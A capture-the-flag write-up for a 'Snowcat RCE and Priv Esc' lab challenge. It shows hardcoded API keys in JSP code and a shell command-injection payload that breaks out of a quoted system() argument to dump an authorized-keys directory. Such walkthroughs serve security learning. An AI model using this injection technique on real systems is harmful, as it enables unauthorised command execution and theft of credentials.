Snowcat RCE and Priv Esc
Difficulty:
Shown in Report
Tom, in the hotel, found a wild Snowcat bug. Help him chase down the RCE! Recover and submit the API key not being used by snowcat.
Objective Image
Back
Challenge

Hey - I’m Tom, part of Counter Hack since 2010. I handle testing, QA, logistics, and making sure everyone has the best possible experience. Outside work, I’m often at the community theater, running sound or producing shows.
We’ve lost access to the neighborhood’s weather monitoring station, and there are unpatched vulnerabilities in the snowcat and weather services.
Task: Exploit the vulnerabilities, retrieve the other app’s authorization key, and enter it into your badge. If Frosty freezes everything, our users won’t have a good experience - they’ll have the coldest one.

Solution

First, we need to find out which old C programs are used by the application. Let's take a look at the source code:

cat weather-jsps/dashboard.jsp 
...
        try {
            String key = "4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6";
            Process tempProc = Runtime.getRuntime().exec("/usr/local/weather/temperature " + key);
            Process humProc = Runtime.getRuntime().exec("/usr/local/weather/humidity " + key);
            Process presProc = Runtime.getRuntime().exec("/usr/local/weather/pressure " + key);
...

Unfortunately, initial simple attempts to find a buffer overflow using fuzzing have failed. Perhaps we can also read something from the strings in the binary before we use a decompiler or other more complex tools.

cd /usr/local/weather/
cat temperature
...
/usr/local/weather/configFailed to open config fileusername=%63s
groupname=%63sInvalid config file format
Invalid username or groupname in config file
Failed to set effective user and group IDs/usr/local/weather/data/temperature%f%.2ftemperature/usr/local/weather/logUsage%s '%s' '%s'/usr/local/weather/keys/authorized_keysFailed to open authorized keys file
Usage: %s <key>
Unauthorized. A valid key must be supplied
wError opening data file%s

We assume the system() command looks roughly like:

system("/usr/local/weather/logUsage '%s' '%s'");

So the shell sees:

/usr/local/weather/logUsage 'user' 'KEY '

To inject commands, we try to escape from the second '...': with a simple pattern of ' ; <your command> ; #:

OUT=/tmp/weather_pwn
KEY="4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6"

temperature "xx ${KEY} yy';cat /usr/local/weather/keys/* >${OUT};#"

This gives us the second key:

user@weather:/usr/local/weather$ cat /tmp/weather_pwn 
4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6
8ade723d-9968-45c9-9c33-7606c49c2201